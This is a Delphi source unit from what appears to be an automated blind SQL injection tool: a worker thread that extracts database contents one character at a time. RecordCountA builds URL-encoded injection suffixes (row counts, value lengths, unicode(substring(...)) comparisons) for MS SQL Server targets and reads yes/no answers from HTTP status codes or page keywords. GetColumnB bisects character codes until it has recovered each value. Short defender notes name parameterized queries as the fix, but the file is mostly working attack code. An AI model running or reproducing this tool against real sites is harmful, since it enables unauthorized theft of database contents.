unit ThreadRecData;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms,idhttp,StrUtils;
type
TThreadRecData = class(TThread)
// Worker thread of a boolean-based blind SQL injection tool: it recovers one
// character of one column value by repeatedly requesting str_url plus a probe
// suffix and reading the server's yes/no answer (HTTP 200 vs 500, or a
// keyword present in the page). Results are pushed back to Form_main.
// Defender note: server-side the technique is defeated by parameterized
// queries; on the wire it is visible as bursts of near-identical requests that
// differ only in a numeric literal, and as the fixed substrings that
// RecordCountA concatenates into the query string.
// HEAD request to URL through TIdHTTP (proxy settings copied from Form_main);
// returns the HTTP response code. Also moves Form_main.ProgressBar.
function GetURL(URL: string): integer;
// Finds the character code at position iPos of row iTop of ColumnName by
// bisecting 1..65535 with RecordCountA(btype=3). Returns the code, 0 when the
// final scan finds no boundary, or 1 when Form_main.stop_record is set.
function GetColumnB(iTop,iPos:integer;str_url:string;sContent:string;tableName:string;ColumnName:string;ColumnNames:TStringList):integer;
// Sends one probe and returns true when the server's answer indicates the
// probed quantity (btype 1: row count, 2: value length, 3: character code)
// is below max_num. Returns false when Inject_methord is 0.
function RecordCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string;ColumnName:string;ColumnNames:TStringList):boolean;
// One-character string for a UTF-16 code unit; '' if the conversion raises.
Function UnicodeToStr(intUnicode:integer):string;
private
// Synchronize target: increments the number displayed in Form_main.Edit1.
procedure UpdateThread;
published
// Thread body: runs GetColumnB with a bounded retry and publishes sResult.
procedure Execute; override;
public
FURL : String; //URL prefix the probe suffix is appended to
min_num : integer; //minimum value (not read by code in this unit; GetColumnB uses locals of the same name)
max_num : integer; //maximum value (likewise not read by code in this unit)
iTop : integer; //row position: the N in "select top N"
iPos : integer; //character position within the value
sContent : string; //page content; passed through but not read by RecordCountA (its only use is commented out)
complete : boolean; //false while Execute is working, true once sResult is set
sResult : string; //recovered character, as returned by UnicodeToStr
tableName : string; //table being probed
ColumnName : string; //column being probed
ColumnNames : TStringList; //column list used to build the select and ORDER BY lists in RecordCountA
end;
implementation
uses
main_unit,CJdatabase_unit,define_unit;
//******************************************************************************
procedure TThreadRecData.Execute;
// Thread body. Marks the work incomplete, bumps the attempt counter in
// Form_main.Edit3 (written directly from this worker thread, unlike
// UpdateThread which goes through Synchronize), asks GetColumnB for the
// character code, retrying while it returns 0 and count<=5, converts the code
// with UnicodeToStr into sResult, sets complete and notifies the form.
var
ss:string;
i:integer;
count:integer; // retry counter; not assigned before its first increment below
label start;
begin
//sleep(1000);
complete:=false;
Form_main.Edit3.Text:=inttostr(strtoint(Form_main.Edit3.Text)+1);
start:
//i:=GetColumnB(min_num,max_num,iTop,iPos,FURL,sContent);
i:=GetColumnB(iTop,iPos,FURL,sContent,tableName,ColumnName,ColumnNames);
// 0 = no boundary found; 1 = stopped via Form_main.stop_record (not special-cased
// here, so it is converted below like any other code)
if i=0 then
begin
count:=count+1;
if count<=5 then
begin
//sleep(1000);
goto start;
end;
{
if application.Messagebox(pchar('An exception occurred while brute-forcing the character; retry?'),pchar('Warning'),MB_YESNO) = IDYES then
goto start; }
end;
//ss:=chr(i);
ss:=UnicodeToStr(i); // when retries are exhausted i is still 0, which presumably yields ''
sResult:=ss;
complete:=true;
Synchronize(UpdateThread);
end;
//******************************************************************************
function TThreadRecData.GetURL(URL: string): integer;
// Issues an HTTP HEAD for URL and returns the response code Indy reports.
// Proxy host/port/credentials are copied from Form_main when proxy_check is
// set; redirects are followed; ReadTimeout comes from TimeOut, which is
// declared in a unit this one uses (not visible here). Every exception from
// the request is swallowed, so on a failed request the returned code is
// whatever TIdHTTP.ResponseCode holds at that point (presumably not 200).
// The ProgressBar writes in the finally block touch the VCL from this worker
// thread rather than through Synchronize.
var
IdHTTP: TIDHttp;
ss: string; // unused: the Get that filled it is commented out below
begin
IdHTTP := TIDHttp.Create(nil);
try
try
if Form_main.proxy_check then
begin
IdHTTP.ProxyParams.ProxyServer:=form_main.str_Host;
IdHTTP.ProxyParams.ProxyPort:=strtoint(form_main.str_Port);
IdHTTP.ProxyParams.ProxyUsername:=form_main.str_Zh;
IdHTTP.ProxyParams.ProxyPassword:=form_main.str_Mm;
end;
IdHTTP.HandleRedirects := true; //redirects must be followed, otherwise errors may occur
IdHTTP.ReadTimeout :=TimeOut; //stop waiting once this time is exceeded
//ss := IdHTTP.Get(URL);
IdHTTP.Head(URL); // HEAD only: callers use the status code, never the body
except
on E: Exception do
{if Pos('10060', e.Message) > 0 then
Application.MessageBox(pchar('Exception occurred, operation aborted!'+#10#13+E.Message),'Notice',mb_ok+mb_iconinformation);}
end;
finally
Form_main.ProgressBar.Position:=0;
Form_main.ProgressBar.Position:=30;
Form_main.ProgressBar.Position:=60;
Form_main.ProgressBar.Position:=100;
result:=IdHTTP.ResponseCode;
IdHTTP.Free;
end;
end;
//******************************************************************************
procedure TThreadRecData.UpdateThread;
// Runs on the main thread via Synchronize: increments the integer shown in
// Form_main.Edit1 by one (StrToInt raises if the box does not hold a number).
var
  shown: integer;
begin
  shown := StrToInt(Form_main.Edit1.Text);
  Form_main.Edit1.Text := IntToStr(shown + 1);
end;
//*****************************************************************************
//暴力破解用的函数,获取列的字符的unicode
function TThreadRecData.GetColumnB(iTop,iPos:integer;str_url:string;sContent:string;tableName:string;ColumnName:string;ColumnNames:TStringList):integer;
// Recovers the character code at position iPos of the value of ColumnName in
// row iTop, using RecordCountA(max,...,btype=3) as a "code < max" oracle.
// One probe at 128 picks the range 32..128 or 128..65535; the range is then
// bisected until it spans at most 2, and a short linear scan finds the first
// max for which the oracle answers true, returning max-1.
// Returns 0 if the linear scan finds no such value, or 1 as soon as
// Form_main.stop_record is seen. The local min_num/max_num shadow the public
// fields of the same name.
var
i:integer;
middle:integer;
min_num,max_num:integer;
begin
min_num:=1;
max_num:=65535; //maximum row record 128 (stale comment: the bound set here is 65535)
result:=0;
//decide whether it is unicode, i.e. outside the 32..128 range
if RecordCountA(128,iTop,iPos,str_url,sContent,3,tableName,ColumnName,ColumnNames) then //if below max, keep narrowing the max side
begin
min_num:=32;
max_num:=128
end else
begin
min_num:=128;
max_num:=65535;
end;
//bisection search
// The for-loop bounds are evaluated once at loop entry, so this loop only caps
// the number of iterations; the real exit is the break once the window is <=2.
for i:=min_num to max_num do
begin
//stop scanning
if Form_main.stop_record=true then
begin
result:=1;
exit;
end;
//sleep(1000);
if max_num-min_num<=2 then
break;
middle:=((max_num-min_num) div 2)+min_num;
if RecordCountA(middle,iTop,iPos,str_url,sContent,3,tableName,ColumnName,ColumnNames) then //if below max, keep narrowing the max side
begin
max_num:=middle;
end
else //otherwise raise the min side
begin
min_num:=middle;
end;
end;
// Linear scan of the remaining window: the first max for which "code < max"
// holds means the code is max-1.
for i:=min_num+1 to max_num do
begin
//stop scanning
if Form_main.stop_record=true then
begin
result:=1;
exit;
end;
if RecordCountA(i,iTop,iPos,str_url,sContent,3,tableName,ColumnName,ColumnNames) then
begin
result:=i-1;
break;
end;
end ;
end;
//*****************************************************************************
//*****************************************************************************
//暴力破解用的函数,猜解记录时构造的sql语句
function TThreadRecData.RecordCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string;ColumnName:string;ColumnNames:TStringList):boolean;
// Sends one yes/no probe and returns the server's answer.
// The request is str_url + URL, where URL is derived from str_ext according
// to CJdatabase_unit.Inject_methord (0: unknown, return false; 1: str_ext
// as-is; 2 and 3: str_ext wrapped in two different fixed prefix/suffix pairs).
// str_ext encodes a comparison "<quantity> < max_num" whose quantity depends
// on btype:
//   1 - number of rows in FDbName..tableName
//   2 - len(ColumnName) of row iTop, rows ordered by str2 then str3
//   3 - unicode() of the iPos-th character of ColumnName of row iTop
// btype 2 and 3 build identical str1/str2/str3 lists (duplicated code): str1
// is the column list, str2/str3 alternate desc/asc and asc/desc per column.
// For any other btype URL stays '' and the bare str_url is requested.
// The answer is read either from page content (keyword checkbox: true when
// Edit_keyword's text occurs in GetURLContent's result) or from the status of
// a HEAD request (200 -> true, 500 -> false, anything else -> retried with no
// bound and no delay via the goto at the end). sContent is not read here.
// Defender note: the status-code oracle depends on the server answering a
// broken query with a different status than a well-formed one; a uniform
// response for query errors removes that signal, and parameterizing the query
// so the suffix is never interpreted as SQL removes the oracle altogether.
var
str1:string;
str2:string;
str3:string;
//str4:string;
str_ext:string;
URL:string;
i:integer;
icode:integer;
content:string;
label start;
begin
//*****************
result:=false;
case btype of
1: begin
str_ext:='%20and%20(select%20count(*)%20from%20'+define_unit.FDbName+'..'+tableName+')<'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('Unknown injection method, cannot proceed'),pchar('Warning'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:='''%20'+str_ext+'%20and%20''''=''';
3 :
URL:='%25''%20'+str_ext+'%20and%20''%25''=''';
end;
end;
2: begin
//************ str1: comma-separated column list
for i:=1 to ColumnNames.Count do
begin
if i=1 then
str1:=ColumnNames.Strings[i-1]
else
str1:=str1+','+ColumnNames.Strings[i-1];
end;
//************ str2: columns with alternating desc/asc
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str2:=ColumnNames.Strings[i-1]+'%20desc'
else
begin
if (i mod 2)=0 then
str2:=str2+','+ColumnNames.Strings[i-1]+'%20asc'
else
str2:=str2+','+ColumnNames.Strings[i-1]+'%20desc';
end;
end;
//************ str3: the reverse ordering of str2
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str3:=ColumnNames.Strings[i-1]+'%20asc'
else
begin
if (i mod 2)=0 then
str3:=str3+','+ColumnNames.Strings[i-1]+'%20desc'
else
str3:=str3+','+ColumnNames.Strings[i-1]+'%20asc';
end;
end;
//************
str_ext:='%20and%20(select%20top%201%20len('+ColumnName+')%20from%20(select%20top%20'+inttostr(iTop)+'%20'+str1+'%20from%20'+define_unit.FDbName+'..'+tableName+'%20order%20by%20'+str2+'%20)%20T%20order%20by%20'+str3+')<'+inttostr(max_num);
//Application.MessageBox(pchar(str_ext),pchar(''),mb_ok);
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('Unknown injection method, cannot proceed'),pchar('Warning'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:='''%20'+str_ext+'%20and%20''''=''';
3 :
URL:='%25''%20'+str_ext+'%20and%20''%25''=''';
end;
end; //end of case 2
3: begin
//************ same three list builders as case 2
for i:=1 to ColumnNames.Count do
begin
if i=1 then
str1:=ColumnNames.Strings[i-1]
else
str1:=str1+','+ColumnNames.Strings[i-1];
end;
//************
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str2:=ColumnNames.Strings[i-1]+'%20desc'
else
begin
if (i mod 2)=0 then
str2:=str2+','+ColumnNames.Strings[i-1]+'%20asc'
else
str2:=str2+','+ColumnNames.Strings[i-1]+'%20desc';
end;
end;
//************
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str3:=ColumnNames.Strings[i-1]+'%20asc'
else
begin
if (i mod 2)=0 then
str3:=str3+','+ColumnNames.Strings[i-1]+'%20desc'
else
str3:=str3+','+ColumnNames.Strings[i-1]+'%20asc';
end;
end;
//************
str_ext:='%20and%20(select%20top%201%20unicode(substring(cast('+ColumnName+'%20as%20nvarchar(100)),'+inttostr(iPos)+',1))%20from%20(select%20top%20'+inttostr(iTop)+'%20'+str1+'%20from%20'+define_unit.FDbName+'..'+tableName+'%20order%20by%20'+str2+'%20)%20T%20order%20by%20'+str3+')<'+inttostr(max_num);
//Application.MessageBox(pchar(str_ext),pchar(''),mb_ok);
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('Unknown injection method, cannot proceed'),pchar('Warning'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:='''%20'+str_ext+'%20and%20''''=''';
3 :
URL:='%25''%20'+str_ext+'%20and%20''%25''=''';
end;
end; //end of case 3
end;
//*****************
//URL:=define_unit.SQLINJECTIONUrlToHex(URL,0);
//if sContent=main_unit.GetWeb(str_url+URL) then
// Keyword mode: the page body is fetched and searched for the user-supplied keyword.
if Form_main.CheckBox_keyword.Checked=true then
begin
content:=define_unit.GetURLContent(str_url+URL);
if pos(trim(Form_main.Edit_keyword.Text),content)>0 then
result:=true
else
result:=false;
end
else
begin
// Status mode: only the HEAD response code is consulted.
start:
icode:=GetURL(str_url+URL);
if icode=200 then
result:=true
else
begin
if icode= 500 then
result:=false
else
begin
//sleep(1000);
goto start; // any other code (including 0 after a swallowed exception in GetURL) retries immediately, forever
end;
end;
end;
end;
//*****************************************************************************
Function TThreadRecData.UnicodeToStr(intUnicode:integer):string;
// Returns the one-character string for UTF-16 code unit intUnicode.
// intUnicode is cast to WideChar, so values outside 0..65535 are either
// truncated by the cast or, with range checking on, raise and yield ''.
// Any exception raised during the conversion also yields ''.
var
  oneChar: WideString;
begin
  Result := '';
  try
    oneChar := WideChar(intUnicode);
    Result := WideCharToString(PWideChar(oneChar));
  except
    // swallowed: the empty string already in Result is the failure value
  end;
end;
end.